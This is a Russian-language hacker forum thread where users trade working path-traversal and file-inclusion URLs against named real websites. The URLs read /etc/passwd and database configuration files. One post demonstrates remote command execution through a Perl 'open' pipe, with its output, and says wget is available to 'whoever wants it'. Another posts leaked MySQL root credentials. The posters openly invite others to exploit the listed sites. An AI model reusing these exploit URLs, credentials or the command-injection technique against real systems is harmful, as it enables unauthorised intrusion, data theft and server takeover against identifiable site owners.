PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00
    Code:
    http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd
     
    _________________________
  2. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    ещё одна

    Code:
    http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../../../etc/passwd
     
    1 person likes this.
  3. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Юзайте кто хотите

    1)
    Code:
    http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd
    
    2)
    Code:
    http://jirisubrt.com/page.php?url=page.php
    открываем сами себя и смотрим в сурцах.
    PHP:
    <?$file=fopen ($url"r");
          
    FPassThru ($file);
        
    ?>
    по сути стандартная читалка
    3)
    Code:
    http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck
    сохраняем потом открываем и любуемся
     
    2 people like this.
  4. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    вот)
     
    3 people like this.
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    мне понравились инклуды) так что проверте и направте меня на правильный путь )
     
    #805 sabe, 14 Jan 2009
    Last edited: 14 Jan 2009
    1 person likes this.
  6. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    От миня

    Code:
    http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
    читаем passwd

    Резуляьтат Смотрим в сурсах
     
    1 person likes this.
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
     
    _________________________
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    случайно нашел, когда ковырял скули)) не крутил - так что грызите =)
     
  9. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Mil.ru
    Министерство обороны Российской Федерации
    тссс))
     
    2 people like this.
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    параметр нужно в base64 перевести...

    данные от мускуля

    $host = "localhost";
    $username ="root";
    $databasename ="dtjnvudb";
    $password = "DBManager";
     
  11. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
    Движлан на перле
    читаем index.pl
    Code:
    http://fleaket.com/index.pl?page=index.pl
    из содержания можно понять.

    Его болезнь
    Code:
    if (open(PAGE, $page))
    стоит проверка на наличие файла.
    Стандартная связка |id| не прокатит
    Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
    Code:
    http://fleaket.com/index.pl?page=/|id|
    ]
    просто получаем выполнение кода.
    uid=48(apache) gid=48(apache) groups=48(apache)

    Code:
    http://fleaket.com/index.pl?page=/|which%20wget|
    /usr/bin/wget

    Вроди как робит вгет, кому надо забирайте.

    Еще из исходника понял, что продукт называется
    PhoneBox
     
    2 people like this.
  12. vikseriq

    vikseriq Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    118
    Likes Received:
    44
    Reputations:
    2
    уязвимость OsCommerce/вывод файлов.
    вот конфиг с паролями отмайскула. кому надо, юзайте )
    http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
    таким образом можно и почитать /etc/passwd, но это уже думайте сами )

    ___
    Спс скажи ++!
     
    2 people like this.
  13. vikseriq

    vikseriq Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    118
    Likes Received:
    44
    Reputations:
    2
    Хотя ладно, пользуйтесь на здоровье:
    http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd
     
  14. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Десяток. PR разношерстный.
     
    2 people like this.
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Edu
    windows
     
    2 people like this.
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd
     
  17. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    edu
    есть пхпмайадмин))
     
    #817 $n@ke, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  18. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Code:
    http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd
    Code:
    http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
    А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=)
     
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    GAV-GAV =)
     
  20. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    gpec.ubc.ca PR5
    Code:
    http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
    Админка:
    Code:
    http://www.gpec.ubc.ca/admin/
    C basic авторизацией =)
    Ну админка лысая =) ее можно посмотреть вот так:
    Code:
    http://www.gpec.ubc.ca/index.php?content=admin/index.php